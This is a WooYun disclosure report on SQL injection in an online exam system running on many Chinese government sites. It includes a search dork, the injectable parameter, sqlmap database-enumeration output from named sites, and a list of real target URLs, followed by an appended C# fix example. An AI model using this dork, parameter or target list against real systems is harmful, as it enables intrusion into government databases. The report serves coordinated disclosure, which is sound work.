
Vulnerability summary

Defect ID: wooyun-2014-078095

Title: SQL injection in a large government platform

Vendor: 杭州精英在线教育科技有限公司 (Hangzhou Jingying Online Education Technology Co., Ltd.)

Author: answer

Submitted: 2014-10-10 14:37

Fixed: 2015-01-08 14:38

Published: 2015-01-08 14:38

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-10-10: Details sent to the vendor; awaiting vendor response
2014-10-14: Vendor confirmed; details visible to the vendor only
2014-10-17: Details opened to third-party security partners
2014-12-08: Details disclosed to core white hats and relevant domain experts
2014-12-18: Details disclosed to regular white hats
2014-12-28: Details disclosed to intern white hats
2015-01-08: Details disclosed to the public

Brief description:

A National Day gift.

Detailed description:

Many government sites use this system.
Google search keyword: inurl:Exam/Default.aspx 技术支持:杭州精英在线教育科技有限公司 ("技术支持" means "technical support", followed by the vendor's name)



Note: the vulnerable file is Exam/Default.aspx, so essentially any site that has this file is compromised. In practice, about 80% of the sites running this system have Exam/Default.aspx.
The vulnerable spot is the exam search box:



The search is a POST request, so capture the request and feed it to sqlmap. The POST body differs somewhat from site to site, so each site has to be captured separately.
The injection point is the parameter ctl09%24txtKeyword (the number in "ctl09" differs between sites, which is a nuisance: every site has to be captured again). Proof follows:
1. http://www.jhpx.com:8002/exam/default.aspx





2. www.yzxxc.gov.cn/Exam/Default.aspx





3. http://www.sxxsdxf.cn/Exam/Default.aspx
Image uploads suddenly stopped working, so the text is pasted instead.
[01:35:28] [INFO] retrieved: model
[01:35:28] [INFO] retrieved: msdb
[01:35:29] [INFO] retrieved: edushaoxingbasentnew
[01:35:30] [INFO] retrieved: edushaoxingforum
[01:35:30] [INFO] retrieved:
available databases [6]:
[*] edushaoxingbasentnew
[*] edushaoxingforum
[*] master
[*] model
[*] msdb
[*] tempdb
4. http://www.csstudy.gov.cn/Exam/Default.aspx
[INFO] retrieved: master
[02:13:27] [INFO] retrieved: model
[02:13:27] [INFO] retrieved: msdb
[02:13:28] [INFO] retrieved: ReportServer
[02:13:28] [INFO] retrieved: ReportServerTempDB
[02:13:29] [INFO] retrieved: tempdb
available databases [11]:
[*] 1
[*] educhangshu
[*] educhangshubasentNew
[*] educhangshubasentold
[*] educhangshuforum
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
That is about enough.
Along the way I also collected some sites for the center to verify:
http://www.jhpx.com:8002/exam/default.aspx
http://www.yzxxc.gov.cn/Exam/Default.aspx
http://www.sxxsdxf.cn/Exam/Default.aspx
http://www.whce.gov.cn/Exam/Default.aspx
http://gbjy.yw.gov.cn/Exam/Default.aspx
http://www.yulinstudy.gov.cn/Exam/Default.aspx
http://www.0575study.gov.cn/Exam/Default.aspx
http://www.csstudy.gov.cn/Exam/Default.aspx
http://wssy.hnsy.org.cn/Exam/Default.aspx
http://www.ndgb.gov.cn/Exam/Default.aspx
................

Proof of vulnerability:


Fix recommendation:

Filter the input.

Copyright notice: when reposting, please credit the source answer@乌云 (WooYun)
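The recommended fix is input filtering; a more robust remediation for a WebForms search box like this one is to bind the keyword as a typed SQL parameter so the database never parses it as SQL. The following is an added example, not code from this report or from the vendor's product: it shows the vulnerable concatenation pattern the report implies beside a parameterized replacement. The `Course` table, its columns, the method names and the 50-character limit are all assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

// Hypothetical search handler behind the exam search box (txtKeyword).
public static class ExamSearch
{
    // VULNERABLE (shown only to make the defect visible; never execute this):
    // the keyword is concatenated into the statement text, so a single quote
    // in the keyword closes the string literal and whatever follows is parsed
    // as SQL. This is the pattern that lets sqlmap enumerate the databases.
    public static string BuildVulnerableSql(string keyword)
    {
        return "SELECT CourseId, CourseName FROM Course WHERE CourseName LIKE '%"
               + keyword + "%'";
    }

    // Parameterization stops injection, but LIKE wildcards are still
    // interpreted inside the bound value; escape them so a user cannot turn
    // "%" or "_" into a match-everything pattern. Assumes ESCAPE '\' below.
    public static string EscapeLike(string s)
    {
        return s.Replace(@"\", @"\\")
                .Replace("%", @"\%")
                .Replace("_", @"\_")
                .Replace("[", @"\[");
    }

    // FIXED: the keyword is bound as an NVARCHAR parameter (@kw), length-
    // limited on the application side and sized on the parameter itself.
    public static List<string> SearchCourses(string connectionString, string keyword)
    {
        if (string.IsNullOrEmpty(keyword) || keyword.Length > 50)
            throw new ArgumentException("keyword missing or too long");

        const string sql =
            "SELECT CourseId, CourseName FROM Course " +
            "WHERE CourseName LIKE '%' + @kw + '%' ESCAPE '\\'";

        var results = new List<string>();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 50).Value = EscapeLike(keyword);
            conn.Open();
            using (SqlDataReader rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                    results.Add(rdr.GetInt32(0) + ": " + rdr.GetString(1));
            }
        }
        return results;
    }
}
```

With the parameterized version, the same sqlmap run against ctlNN$txtKeyword should report the parameter as not injectable; the length check and wildcard escaping are defense in depth, not the primary fix.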


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 16

Confirmed at: 2014-10-14 17:19

Vendor reply:

Latest status:

None yet